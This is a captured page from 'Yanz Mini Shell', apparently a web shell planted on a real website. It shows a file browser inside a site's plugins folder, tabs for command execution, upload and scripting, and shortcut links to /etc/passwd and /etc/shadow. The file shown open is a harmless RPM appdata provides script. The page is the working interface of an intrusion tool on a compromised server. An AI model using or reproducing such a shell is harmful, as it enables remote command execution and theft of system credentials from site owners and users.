Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
#!/bin/sh # # Transform appdata xml file into RPM appdata(filename) provides # # Author: Michael Schroeder <mls@suse.de> # Based on other provides scripts from RPM OLD_IFS="$IFS" while read instfile ; do case "$instfile" in *.appdata.xml) echo "appdata()" echo "appdata(${instfile##*/appdata/})" ;; esac done IFS=$OLD_IFS
Free Space : 11741585408 Byte